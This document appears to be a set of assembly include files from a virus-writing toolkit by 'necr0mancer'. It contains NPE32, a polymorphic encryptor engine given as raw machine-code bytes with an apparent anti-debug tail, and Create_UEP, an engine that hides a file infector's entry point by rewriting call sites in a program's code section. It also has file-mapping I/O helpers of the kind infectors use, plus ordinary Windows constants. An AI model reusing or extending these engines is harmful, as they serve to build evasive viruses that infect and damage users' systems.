;        ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
;        ³  8..11  ³ number of commands in using commands  ³
;        ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
;        ³  11..16 ³ number of commands in using garbage   ³
;        ÀÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
;
; 	  Regs32 (bits 0..6):
;        ÚÄÄÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄ¿
;        ³ bit ³ 0 ³ 1 ³ 2 ³ 3 ³ 4 ³ 5 ³ 6 ³
;        ÃÄÄÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
;        ³ reg ³EAX³EBX³EDX³ECX³ESI³EDI³EBP³
;        ÀÄÄÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÙ
;
;   Seed:
;  	 if this parametr is not NULL then randseed generator of NPE32
;        gets a new value for inicialize.If it is NULL NPE32 use getted
;        value for any random operations.
;
;And one 'little' thing : npe32 has a bug working in multi-layer mode,
;which destroyes original data.If size of encryptors+data more than
;D00h bytes it happends.
;
;necr0mancer2001@hotmail.com
npe_main:
db 060h,0E8h,000h,000h,000h,000h,05Dh,0EBh,077h,081h,0C0h,0A1h,001h,081h,0E8h
db 0A1h,000h,081h,0F0h,0A1h,002h,0F7h,0D0h,085h,003h,0D1h,0C0h,085h,005h,0D1h
db 0C8h,085h,004h,040h,000h,045h,007h,048h,000h,045h,006h,0F7h,0D8h,085h,008h
db 087h,0C0h,082h,000h,08Bh,0C0h,082h,000h,083h,0C0h,0C9h,000h,083h,0E8h,0C9h
db 000h,090h,090h,040h,000h,0EBh,000h,080h,000h,083h,0C8h,0CDh,000h,083h,0F0h
db 0CDh,000h,00Bh,0C0h,082h,000h,023h,0C0h,082h,000h,000h,003h,002h,001h,006h
db 007h,005h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,061h,0F9h,0C3h,08Bh,04Ch,024h,030h,0E3h,006h,089h
db 08Dh,0D0h,004h,000h,000h,08Bh,054h,024h,034h,052h,083h,0E2h,07Fh,08Dh,07Dh
db 070h,08Dh,075h,04Fh,033h,0C0h,040h,06Ah,007h,059h,033h,0DBh,052h,023h,0D0h
db 074h,002h,043h,0A4h,0D1h,0E0h,05Ah,0E2h,0F4h,00Bh,0DBh,074h,0CBh,083h,0FBh
db 003h,072h,0C6h,089h,09Dh,0BBh,003h,000h,000h,058h,08Bh,0D0h,066h,081h,0E2h
db 0FFh,000h,066h,025h,000h,0FFh,0C1h,0E8h,008h,08Bh,0C8h,025h,0F0h,000h,000h
db 000h,0C1h,0E8h,004h,083h,0F8h,009h,076h,003h,06Ah,009h,058h,00Bh,0C0h,074h
db 09Bh,089h,085h,0C2h,001h,000h,000h,083h,0E1h,00Fh,083h,0F9h,00Ah,076h,003h
db 06Ah,00Ah,059h,00Bh,0C9h,074h,086h,089h,08Dh,0D1h,003h,000h,000h,08Bh,04Ch
db 024h,02Ch,089h,08Dh,0F5h,002h,000h,000h,08Bh,07Ch,024h,028h,08Bh,074h,024h
db 024h,057h,053h,051h,081h,0C7h,000h,00Ch,000h,000h,057h,0B8h,090h,000h,000h
db 000h,003h,0C8h,0F3h,0AAh,05Fh,059h,08Bh,0DFh,00Fh,0BAh,0E2h,007h,073h,017h
db 051h,056h,08Dh,0B5h,007h,005h,000h,000h,0B9h,019h,000h,000h,000h,001h,08Dh
db 0F5h,002h,000h,000h,0F3h,0A4h,05Eh,059h,0F3h,0A4h,08Dh,08Dh,0CDh,004h,000h
db 000h,058h,08Bh,0F0h,0FFh,0D1h,08Ah,054h,005h,070h,08Bh,0C6h,0FFh,0D1h,08Ah
db 074h,005h,070h,03Ah,0F2h,074h,0F4h,088h,075h,057h,056h,04Eh,04Eh,08Bh,0C6h
db 0FFh,0D1h,040h,066h,089h,085h,0FEh,002h,000h,000h,091h,058h,08Dh,075h,070h
db 08Dh,07Dh,064h,0E8h,00Eh,003h,000h,000h,05Fh,057h,033h,0C0h,0E8h,0E1h,000h
db 000h,000h,050h,0DBh,01Ch,024h,058h,06Ah,005h,058h,0E8h,03Eh,003h,000h,000h
db 040h,091h,08Bh,044h,024h,004h,005h,000h,00Ch,000h,000h,089h,045h,05Ch,051h
db 057h,00Fh,0B7h,085h,0FEh,002h,000h,000h,08Bh,0C8h,048h,08Dh,075h,064h,08Dh
db 07Eh,006h,08Bh,0DFh,0E8h,0D1h,002h,000h,000h,05Fh,087h,0F3h,0ACh,08Ah,0F0h
db 056h,033h,0C0h,0B0h,0FFh,0BBh,000h,000h,000h,000h,08Dh,075h,003h,0E8h,013h
db 002h,000h,000h,08Dh,075h,05Ch,087h,026h,08Ah,0E6h,050h,08Bh,045h,060h,050h
db 087h,026h,05Eh,0E2h,0DAh,059h,0E2h,0BBh,033h,0C0h,0E8h,047h,001h,000h,000h
db 05Eh,060h,0FFh,0D6h,061h,05Fh,057h,08Bh,0DFh,081h,0C3h,000h,00Ch,000h,000h
db 056h,053h,0B0h,001h,0E8h,062h,000h,000h,000h,0E8h,0A7h,001h,000h,000h,08Dh
db 075h,05Ch,087h,026h,058h,089h,045h,060h,058h,08Bh,0DCh,087h,026h,08Bh,00Ch
db 024h,03Bh,0D9h,077h,00Eh,08Ah,0F4h,0B4h,000h,08Dh,075h,003h,0E8h,0BAh,001h
db 000h,000h,0EBh,0D8h,0B0h,001h,0E8h,000h,001h,000h,000h,08Bh,0DFh,05Eh,00Fh
db 0B7h,085h,0FEh,002h,000h,000h,0B9h,000h,000h,000h,000h,066h,0F7h,0E1h,091h
db 0F3h,0A5h,058h,02Bh,0F8h,089h,07Ch,024h,01Ch,0BFh,000h,000h,000h,000h,08Bh
db 045h,058h,050h,0DBh,01Ch,024h,059h,02Bh,0D9h,003h,0C3h,0ABh,0F8h,061h,0C2h
db 014h,000h,08Bh,0F7h,0FEh,0C8h,075h,008h,08Dh,08Dh,0ADh,003h,000h,000h,0EBh
db 006h,08Dh,08Dh,0E0h,003h,000h,000h,033h,0C0h,048h,0E8h,04Eh,002h,000h,000h
db 089h,045h,058h,0FFh,0D1h,057h,0DBh,004h,024h,058h,0B0h,0E8h,0AAh,033h,0C0h
db 0ABh,0FFh,0D1h,052h,08Bh,085h,0BBh,003h,000h,000h,0E8h,030h,002h,000h,000h
db 08Ah,074h,005h,070h,080h,0FEh,000h,074h,0ECh,0B0h,058h,00Ah,0C6h,0AAh,0FFh
db 0D1h,066h,0B8h,081h,0E8h,00Ah,0E6h,066h,0ABh,08Bh,045h,058h,083h,0C0h,005h
db 0ABh,0FFh,0D1h,051h,066h,0B8h,08Dh,080h,00Ah,0E6h,08Ah,075h,057h,08Ah,0D6h
db 0C0h,0E6h,003h,00Ah,0E6h,066h,0ABh,08Bh,045h,058h,02Bh,0DEh,003h,0C3h,089h
db 0BDh,04Dh,002h,000h,000h,0ABh,059h,0FFh,0D1h,066h,0B8h,087h,0E0h,00Ah,0E2h
db 066h,0ABh,05Ah,0FFh,0D1h,0B0h,0B8h,00Ah,0C2h,0AAh,052h,051h,0B8h,000h,000h
db 000h,000h,099h,033h,0C9h,066h,0B9h,000h,000h,0C1h,0E1h,002h,066h,0F7h,0F1h
db 040h,089h,085h,03Bh,002h,000h,000h,0ABh,059h,0FFh,0D1h,08Bh,0C7h,040h,089h
db 085h,07Bh,003h,000h,000h,087h,0CAh,00Fh,0B6h,08Dh,0FEh,002h,000h,000h,08Dh
db 075h,064h,0ACh,00Ch,058h,0AAh,0FFh,0D2h,0E2h,0F8h,05Ah,0C3h,053h,050h,0FEh
db 0C8h,075h,008h,08Dh,09Dh,0ADh,003h,000h,000h,0EBh,006h,08Dh,09Dh,0E0h,003h
db 000h,000h,0FFh,0D3h,00Fh,0B6h,08Dh,0FEh,002h,000h,000h,051h,08Dh,075h,064h
db 003h,0F1h,04Eh,0FDh,0ACh,0FCh,00Ch,050h,0AAh,0FFh,0D3h,0E2h,0F6h,066h,0B8h
db 081h,0C4h,066h,0ABh,058h,0C1h,0E0h,002h,0ABh,0FFh,0D3h,066h,0B8h,048h,074h
db 00Ah,0C2h,066h,0ABh,057h,0AAh,0FFh,0D3h,0B0h,0E9h,0AAh,0BEh,000h,000h,000h
db 000h,08Bh,0C7h,083h,0C0h,005h,02Bh,0C6h,0F7h,0D8h,0ABh,0FFh,0D3h,087h,0FEh
db 05Fh,08Bh,0C6h,02Bh,0C7h,048h,0AAh,087h,0FEh,0FFh,0D3h,066h,0B8h,087h,0E0h
db 00Ah,065h,057h,066h,0ABh,0FFh,0D3h,058h,0FEh,0C8h,074h,003h,0B0h,0C3h,0AAh
db 05Bh,0C3h,060h,0B8h,006h,000h,000h,000h,0E8h,015h,001h,000h,000h,040h,091h
db 0B8h,000h,000h,000h,000h,0E8h,009h,001h,000h,000h,08Ah,074h,005h,070h,0B8h
db 0FFh,000h,000h,000h,08Dh,075h,027h,0BBh,000h,000h,000h,000h,0E8h,007h,000h
db 000h,000h,0E2h,0DEh,089h,03Ch,024h,061h,0C3h,060h,03Ch,0FFh,074h,016h,0C6h
db 045h,056h,001h,08Dh,004h,086h,00Fh,0B6h,058h,003h,08Dh,004h,09Eh,08Ah,050h
db 002h,066h,08Bh,000h,0EBh,017h,0C6h,045h,056h,000h,093h,0E8h,0C7h,000h,000h
db 000h,089h,044h,024h,01Ch,08Dh,004h,086h,08Ah,050h,002h,066h,08Bh,000h,08Ah
db 0EAh,080h,0FEh,000h,075h,006h,00Fh,0BAh,0E2h,002h,073h,062h,080h,0E2h,003h
db 00Ah,0D2h,074h,013h,0FEh,0CAh,074h,007h,08Ah,0D6h,0C0h,0E2h,003h,00Ah,0E2h
db 00Ah,0E4h,075h,002h,00Ah,0C6h,00Ah,0E6h,08Ah,0D5h,080h,0E2h,0C0h,0C0h,0EAh
db 006h,0FEh,0CAh,075h,003h,0AAh,0EBh,002h,066h,0ABh,08Ah,0D5h,080h,0E2h,038h
db 0C0h,0EAh,003h,0FEh,04Dh,056h,074h,00Dh,033h,0C0h,048h,0E8h,06Dh,000h,000h
db 000h,089h,045h,060h,0EBh,003h,08Bh,045h,060h,080h,0FAh,004h,074h,00Bh,080h
db 0FAh,002h,074h,009h,0FEh,0CAh,074h,009h,0EBh,00Ah,0ABh,0EBh,007h,066h,0ABh
db 0EBh,003h,033h,0C0h,0AAh,089h,03Ch,024h,061h,0C3h,060h,049h,074h,02Bh,050h
db 058h,050h,0E8h,03Ah,000h,000h,000h,08Ah,004h,006h,03Ah,0C2h,074h,0F2h,03Ah
db 045h,057h,074h,0EDh,0AAh,086h,0E0h,05Bh,0ACh,03Ah,0C2h,074h,0FBh,03Ah,045h
db 057h,074h,0F6h,03Ah,0C4h,074h,0F2h,0AAh,0E2h,0EFh,061h,0C3h,093h,08Bh,0C3h
db 0E8h,00Fh,000h,000h,000h,08Ah,004h,006h,03Ah,0C2h,074h,0F2h,03Ah,045h,057h
db 074h,0EDh,0AAh,061h,0C3h,060h,050h,0B8h,078h,056h,034h,012h,0BFh,005h,084h
db 008h,008h,0F7h,0E7h,040h,089h,085h,0D0h,004h,000h,000h,033h,0D2h,059h,00Bh
db 0C9h,074h,006h,0F7h,0F1h,089h,054h,024h,01Ch,061h,0C3h,04Eh,050h,045h,033h
db 032h,05Bh,031h,033h,031h,038h,05Dh,06Eh,065h,063h,072h,030h,06Dh,061h,06Eh
db 063h,065h,072h,057h,00Fh,001h,04Ch,024h,0FEh,05Fh,089h,047h,008h,089h,047h
db 018h,00Fh,023h,0C0h,00Fh,023h,0C8h,00Fh,023h,0D0h,00Fh,023h,0D8h 
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[NPE32BIN.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RING3IO.INC]ÄÄÄ
;Include file ring-3 InputOutput functions
;(c) necr0mancer
;
;						necr0mancer2001@hotmail.com

;-------------------------------
;Input:edx=offset of filename

fopen  proc

       pushad

       xor ebx,ebx

       push ebx
       push FILE_ATTRIBUTE_NORMAL
       push OPEN_EXISTING
       push ebx
       push FILE_SHARE_READ + FILE_SHARE_WRITE
       push GENERIC_READ + GENERIC_WRITE
       push edx
       call [ebp+CreateFile @ex]

       inc eax                 ;eax=-1?
       jz fopen_exit
       dec eax

fopen_exit:

       mov [esp._eax], eax
       popad
       retn
fopen  endp


;-------------------------------
;Input:ebx=handle

fclose proc

       pushad

       push ebx
       call [ebp+CloseHandle @ex]

       popad
       retn
fclose endp


;-------------------------------
;Input:ebx=handle file
;      ecx=count of bytes to read
;      edx=offset of bufer
fread  proc

       pushad

       push 0

       lea eax,[ebp+offset bytesread @ex]
       push eax

       push ecx
       push edx
       push ebx
       call [ebp+ReadFile @ex]

       popad
       retn
fread  endp

;-------------------------------
;Input:ebx=handle file
;      ecx=count of bytes to move
fseek  proc

       pushad

       push FILE_BEGIN
       push 0
       push ecx
       push ebx
       call [ebp+SetFilePointer @ex]

       popad
       retn
fseek  endp



;-------------------------------
;Input:ebx=handle file
;      ecx=count of bytes to write
;      edi=offset of bufer

fwrite  proc

       pushad

       push 0

       lea eax,[ebp+offset bytesread @ex]
       push eax

       push ecx
       push edi

       push ebx
       call [ebp+WriteFile @ex]

       popad
       retn
fwrite  endp


f_createmap  proc
       pusha

       xor eax,eax
       push eax			    ;for mapvievoffile

       push eax			    ;name
       push eax                     ;lowsize
       push eax                     ;highsize
       push PAGE_READWRITE
       push eax
       push ebx
       call [ebp+CreateFileMappingA @ex]

       xchg ebx,eax

       pop eax			    ;null
       push eax			    ;count bytes
       push eax                     ;lowsize
       push eax                     ;highsize
       push FILE_MAP_WRITE
       push ebx
       call [ebp+MapViewOfFile @ex]

       mov [esp+_eax],eax
       popa
       retn
f_createmap  endp
    

f_closemap  proc
       pusha
       push ebx
       call [ebp+UnmapViewOfFile @ex]
       popa
       retn
f_closemap  endp
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RING3IO.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RIPBIN.INC]ÄÄÄ
;It "engine" I have written for fun;)
;-----------------------------------------------------------------------------
;Create_UEP(
;	dword   VO			// virtual offset   		
;	*dword  code			// offset to .code section(already has read)  		
;	*dword  reloc   		// offset to .reloc section(already has read)  		
;	dword   num_records	        // count of records in table to rewrite
;       *dword  adr_modify		// address of "replasing" proc
;       *dword  mask_table              // pointer to a mask table
;        );
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Create_UEP:
db 060h,08Bh,074h,024h,02Ch,08Bh,07Ch,024h,028h,081h,0EFh,000h,010h,000h,000h
db 003h,03Eh,08Bh,046h,004h,0BAh,008h,000h,000h,000h,052h,02Bh,0C2h,099h,0B9h
db 002h,000h,000h,000h,066h,0F7h,0F1h,05Ah,091h,00Fh,0B7h,004h,016h,066h,025h
db 0FFh,00Fh,003h,0C7h,056h,051h,093h,08Bh,074h,024h,040h,033h,0C0h,0ACh,00Fh
db 0B6h,0C8h,066h,0ADh,00Bh,0C0h,074h,012h,049h,074h,008h,066h,039h,043h,0FEh
db 074h,026h,0EBh,005h,038h,043h,0FEh,074h,01Fh,0EBh,0E4h,059h,05Eh,083h,0C2h
db 002h,0E2h,0CAh,08Bh,046h,004h,003h,0F0h,099h,033h,0D2h,0BBh,000h,010h,000h
db 000h,0F7h,0F3h,00Bh,0D2h,074h,095h,0F9h,0EBh,02Dh,093h,059h,05Eh,051h,057h
db 0F8h,08Dh,05Ch,024h,038h,0FFh,00Bh,08Bh,00Bh,0E3h,01Bh,048h,048h,08Bh,0D8h
db 02Bh,0C7h,003h,006h,087h,0DFh,093h,056h,08Bh,074h,024h,030h,08Bh,044h,024h
db 040h,0FFh,0D0h,05Eh,05Fh,059h,0EBh,0BAh,05Fh,059h,061h,0C2h,018h,000h 
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RIPBIN.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN.INC]ÄÄÄ
;Windows95/NT assembly language include file by SMT/SMF. All rights reserved.
;Modifed by Necr0mancer.No rights reserved.

NULL equ 0
TRUE equ 1
FALSE equ 0

MAX_PATH                equ 260
PIPE_WAIT               equ 00000000h
PIPE_NOWAIT             equ 00000001h
PIPE_READMODE_BYTE      equ 00000000h
PIPE_READMODE_MESSAGE   equ 00000002h
PIPE_TYPE_BYTE          equ 00000000h
PIPE_TYPE_MESSAGE       equ 00000004h
SC_SIZE         equ 0F000h
SC_MOVE         equ 0F010h
SC_MINIMIZE     equ 0F020h
SC_MAXIMIZE     equ 0F030h
SC_NEXTWINDOW   equ 0F040h
SC_PREVWINDOW   equ 0F050h
SC_CLOSE        equ 0F060h
SC_VSCROLL      equ 0F070h
SC_HSCROLL      equ 0F080h
SC_MOUSEMENU    equ 0F090h
SC_KEYMENU      equ 0F100h
SC_ARRANGE      equ 0F110h
SC_RESTORE      equ 0F120h
SC_TASKLIST     equ 0F130h
SC_SCREENSAVE   equ 0F140h
SC_HOTKEY       equ 0F150h
SC_DEFAULT      equ 0F160h
SC_MONITORPOWER equ 0F170h
SC_CONTEXTHELP  equ 0F180h
SC_SEPARATOR    equ 0F00Fh
                
WM_NULL                         equ 0000h
WM_CREATE                       equ 0001h
WM_DESTROY                      equ 0002h
WM_MOVE                         equ 0003h
WM_SIZE                         equ 0005h
WM_ACTIVATE                     equ 0006h
WA_INACTIVE                     equ 0
WA_ACTIVE                       equ 1
WA_CLICKACTIVE                  equ 2
WM_SETFOCUS                     equ 0007h
WM_KILLFOCUS                    equ 0008h
WM_ENABLE                       equ 000Ah
WM_SETREDRAW                    equ 000Bh
WM_SETTEXT                      equ 000Ch
WM_GETTEXT                      equ 000Dh
WM_GETTEXTLENGTH                equ 000Eh
WM_PAINT                        equ 000Fh
WM_CLOSE                        equ 0010h
WM_QUERYENDSESSION              equ 0011h
WM_QUIT                         equ 0012h
WM_QUERYOPEN                    equ 0013h
WM_ERASEBKGND                   equ 0014h
WM_SYSCOLORCHANGE               equ 0015h
WM_ENDSESSION                   equ 0016h
WM_SHOWWINDOW                   equ 0018h
WM_WININICHANGE                 equ 001Ah
WM_DEVMODECHANGE                equ 001Bh
WM_ACTIVATEAPP                  equ 001Ch
WM_FONTCHANGE                   equ 001Dh
WM_TIMECHANGE                   equ 001Eh
WM_CANCELMODE                   equ 001Fh
WM_SETCURSOR                    equ 0020h
WM_MOUSEACTIVATE                equ 0021h
WM_CHILDACTIVATE                equ 0022h
WM_QUEUESYNC                    equ 0023h
WM_GETMINMAXINFO                equ 0024h
WM_PAINTICON                    equ 0026h
WM_ICONERASEBKGND               equ 0027h
WM_NEXTDLGCTL                   equ 0028h
WM_SPOOLERSTATUS                equ 002Ah
WM_DRAWITEM                     equ 002Bh
WM_MEASUREITEM                  equ 002Ch
WM_DELETEITEM                   equ 002Dh
WM_VKEYTOITEM                   equ 002Eh
WM_CHARTOITEM                   equ 002Fh
WM_SETFONT                      equ 0030h
WM_GETFONT                      equ 0031h
WM_SETHOTKEY                    equ 0032h
WM_GETHOTKEY                    equ 0033h
WM_QUERYDRAGICON                equ 0037h
WM_COMPAREITEM                  equ 0039h
WM_COMPACTING                   equ 0041h
WM_COMMNOTIFY                   equ 0044h ; /* no longer suported */
WM_WINDOWPOSCHANGING            equ 0046h
WM_WINDOWPOSCHANGED             equ 0047h
WM_POWER                        equ 0048h
WM_COPYDATA                     equ 004Ah
WM_CANCELJOURNAL                equ 004Bh
WM_NOTIFY                       equ 004Eh
WM_INPUTLANGCHANGERequEST       equ 0050h
WM_INPUTLANGCHANGE              equ 0051h
WM_TCARD                        equ 0052h
WM_HELP                         equ 0053h
WM_USERCHANGED                  equ 0054h
WM_NOTIFYFORMAT                 equ 0055h
NFR_ANSI                        equ    1h
NFR_UNICODE                     equ    2h
NF_QUERY                        equ    3h
NF_RequERY                      equ    4h
WM_CONTEXTMENU                  equ 007Bh
WM_STYLECHANGING                equ 007Ch
WM_STYLECHANGED                 equ 007Dh
WM_DISPLAYCHANGE                equ 007Eh
WM_GETICON                      equ 007Fh
WM_SETICON                      equ 0080h
WM_NCCREATE                     equ 0081h
WM_NCDESTROY                    equ 0082h
WM_NCCALCSIZE                   equ 0083h
WM_NCHITTEST                    equ 0084h
WM_NCPAINT                      equ 0085h
WM_NCACTIVATE                   equ 0086h
WM_GETDLGCODE                   equ 0087h
WM_NCMOUSEMOVE                  equ 00A0h
WM_NCLBUTTONDOWN                equ 00A1h
WM_NCLBUTTONUP                  equ 00A2h
WM_NCLBUTTONDBLCLK              equ 00A3h
WM_NCRBUTTONDOWN                equ 00A4h
WM_NCRBUTTONUP                  equ 00A5h
WM_NCRBUTTONDBLCLK              equ 00A6h
WM_NCMBUTTONDOWN                equ 00A7h
WM_NCMBUTTONUP                  equ 00A8h
WM_NCMBUTTONDBLCLK              equ 00A9h
WM_KEYFIRST                     equ 0100h
WM_KEYDOWN                      equ 0100h
WM_KEYUP                        equ 0101h
WM_CHAR                         equ 0102h
WM_DEADCHAR                     equ 0103h
WM_SYSKEYDOWN                   equ 0104h
WM_SYSKEYUP                     equ 0105h
WM_SYSCHAR                      equ 0106h
WM_SYSDEADCHAR                  equ 0107h
WM_KEYLAST                      equ 0108h
WM_IME_STARTCOMPOSITION         equ 010Dh
WM_IME_ENDCOMPOSITION           equ 010Eh
WM_IME_COMPOSITION              equ 010Fh
WM_IME_KEYLAST                  equ 010Fh
WM_INITDIALOG                   equ 0110h
WM_COMMAND                      equ 0111h
WM_SYSCOMMAND                   equ 0112h
WM_TIMER                        equ 0113h
WM_HSCROLL                      equ 0114h
WM_VSCROLL                      equ 0115h
WM_INITMENU                     equ 0116h
WM_INITMENUPOPUP                equ 0117h
WM_MENUSELECT                   equ 011Fh
WM_MENUCHAR                     equ 0120h
WM_ENTERIDLE                    equ 0121h
WM_CTLCOLORMSGBOX               equ 0132h
WM_CTLCOLOREDIT                 equ 0133h
WM_CTLCOLORLISTBOX              equ 0134h
WM_CTLCOLORBTN                  equ 0135h
WM_CTLCOLORDLG                  equ 0136h
WM_CTLCOLORSCROLLBAR            equ 0137h
WM_CTLCOLORSTATIC               equ 0138h
WM_MOUSEFIRST                   equ 0200h
WM_MOUSEMOVE                    equ 0200h
WM_LBUTTONDOWN                  equ 0201h
WM_LBUTTONUP                    equ 0202h
WM_LBUTTONDBLCLK                equ 0203h
WM_RBUTTONDOWN                  equ 0204h
WM_RBUTTONUP                    equ 0205h
WM_RBUTTONDBLCLK                equ 0206h
WM_MBUTTONDOWN                  equ 0207h
WM_MBUTTONUP                    equ 0208h
WM_MBUTTONDBLCLK                equ 0209h
WM_MOUSEWHEEL                   equ 020Ah
WM_PARENTNOTIFY                 equ 0210h
MENULOOP_WINDOW                 equ    0h
MENULOOP_POPUP                  equ    1h
WM_ENTERMENULOOP                equ 0211h
WM_EXITMENULOOP                 equ 0212h
WM_SIZING                       equ 0214h
WM_CAPTURECHANGED               equ 0215h
WM_MOVING                       equ 0216h
WM_POWERBROADCAST               equ 0218h
WM_DEVICECHANGE                 equ 0219h
WM_IME_SETCONTEXT               equ 0281h
WM_IME_NOTIFY                   equ 0282h
WM_IME_CONTROL                  equ 0283h
WM_IME_COMPOSITIONFULL          equ 0284h
WM_IME_SELECT                   equ 0285h
WM_IME_CHAR                     equ 0286h
WM_IME_KEYDOWN                  equ 0290h
WM_IME_KEYUP                    equ 0291h
WM_MDICREATE                    equ 0220h
WM_MDIDESTROY                   equ 0221h
WM_MDIACTIVATE                  equ 0222h
WM_MDIRESTORE                   equ 0223h
WM_MDINEXT                      equ 0224h
WM_MDIMAXIMIZE                  equ 0225h
WM_MDITILE                      equ 0226h
WM_MDICASCADE                   equ 0227h
WM_MDIICONARRANGE               equ 0228h
WM_MDIGETACTIVE                 equ 0229h
WM_MDISETMENU                   equ 0230h
WM_ENTERSIZEMOVE                equ 0231h
WM_EXITSIZEMOVE                 equ 0232h
WM_DROPFILES                    equ 0233h
WM_MDIREFRESHMENU               equ 0234h
WM_MOUSEHOVER                   equ 02A1h
WM_MOUSELEAVE                   equ 02A3h
WM_CUT                          equ 0300h
WM_COPY                         equ 0301h
WM_PASTE                        equ 0302h
WM_CLEAR                        equ 0303h
WM_UNDO                         equ 0304h
WM_RENDERFORMAT                 equ 0305h
WM_RENDERALLFORMATS             equ 0306h
WM_DESTROYCLIPBOARD             equ 0307h
WM_DRAWCLIPBOARD                equ 0308h
WM_PAINTCLIPBOARD               equ 0309h
WM_VSCROLLCLIPBOARD             equ 030Ah
WM_SIZECLIPBOARD                equ 030Bh
WM_ASKCBFORMATNAME              equ 030Ch
WM_CHANGECBCHAIN                equ 030Dh
WM_HSCROLLCLIPBOARD             equ 030Eh
WM_QUERYNEWPALETTE              equ 030Fh
WM_PALETTEISCHANGING            equ 0310h
WM_PALETTECHANGED               equ 0311h
WM_HOTKEY                       equ 0312h
WM_PRINT                        equ 0317h
WM_PRINTCLIENT                  equ 0318h
WM_HANDHELDFIRST                equ 0358h
WM_HANDHELDLAST                 equ 035Fh
WM_AFXFIRST                     equ 0360h
WM_AFXLAST                      equ 037Fh
WM_PENWINFIRST                  equ 0380h
WM_PENWINLAST                   equ 038Fh
                                    
                                    
                                    
MB_OK                   equ             000000000h
MB_OKCANCEL             equ             000000001h
MB_ABORTRETRYIGNORE     equ             000000002h
MB_YESNOCANCEL          equ             000000003h
MB_YESNO                equ             000000004h
MB_RETRYCANCEL          equ             000000005h
MB_TYPEMASK             equ             00000000fh
MB_ICONHAND             equ             000000010h
MB_ICONQUESTION         equ             000000020h
MB_ICONEXCLAMATION      equ             000000030h
MB_ICONASTERISK         equ             000000040h
MB_ICONMASK             equ             0000000f0h
MB_ICONINFORMATION      equ             000000040h
MB_ICONSTOP             equ             000000010h
MB_DEFBUTTON1           equ             000000000h
MB_DEFBUTTON2           equ             000000100h
MB_DEFBUTTON3           equ             000000200h
MB_DEFMASK              equ             000000f00h
MB_APPLMODAL            equ             000000000h
MB_SYSTEMMODAL          equ             000001000h
MB_TASKMODAL            equ             000002000h
MB_NOFOCUS              equ             000008000h
IDNO                    equ             7
IDYES                   equ             6
IDCANCEL                equ             2
SB_HORZ                 equ     0
SB_VERT                 equ     1
SB_CTL                  equ     2
SB_BOTH                 equ     3
SB_THUMBPOSITION        equ     4
SB_ENDSCROLL            equ     8

SW_HIDE                 equ     00h
SW_SHOWNORMAL           equ     01h
SW_SHOWMINIMIZED        equ     02h
SW_SHOWMAXIMIZED        equ     03h
SW_SHOW                 equ     05h
SW_RESTORE              equ     09h
SW_SHOWDEFAULT          equ     0Ah
WM_USER                 equ     0400h

WS_POPUP                equ     080000000h
WS_CHILD                equ     040000000h
WS_MINIMIZE             equ     020000000h
WS_VISIBLE              equ     010000000h
WS_MAXIMIZE             equ     001000000h
WS_CAPTION              equ     000C00000h
WS_BORDER               equ     000800000h
WS_DLGFRAME             equ     000400000h
WS_VSCROLL              equ     000200000h
WS_HSCROLL              equ     000100000h
WS_SYSMENU              equ     000080000h
;WS_SIZEBOX             equ     000040000h
WS_MINIMIZEBOX          equ     000020000h
WS_MAXIMIZEBOX          equ     000010000h
WS_OVERLAPPEDWINDOW     equ     000CF0000h
WS_EX_NOPARENTNOTIFY    equ     000000004h
WS_EX_WINDOWEDGE        equ     000000100h
WS_EX_CLIENTEDGE        equ     000000200h
WS_EX_OVERLAPPEDWINDOW  equ     WS_EX_WINDOWEDGE + WS_EX_CLIENTEDGE

CS_VREDRAW              equ     00001h
CS_HREDRAW              equ     00002h
CS_PARENTDC             equ     00080h
CS_BYTEALIGNWINDOW      equ     02000h

BDR_RAISEDOUTER         equ     01h
BDR_SUNKENOUTER         equ     02h
BDR_RAISEDINNER         equ     04h
BDR_SUNKENINNER         equ     08h
EDGE_RAISED             equ     BDR_RAISEDOUTER + BDR_RAISEDINNER
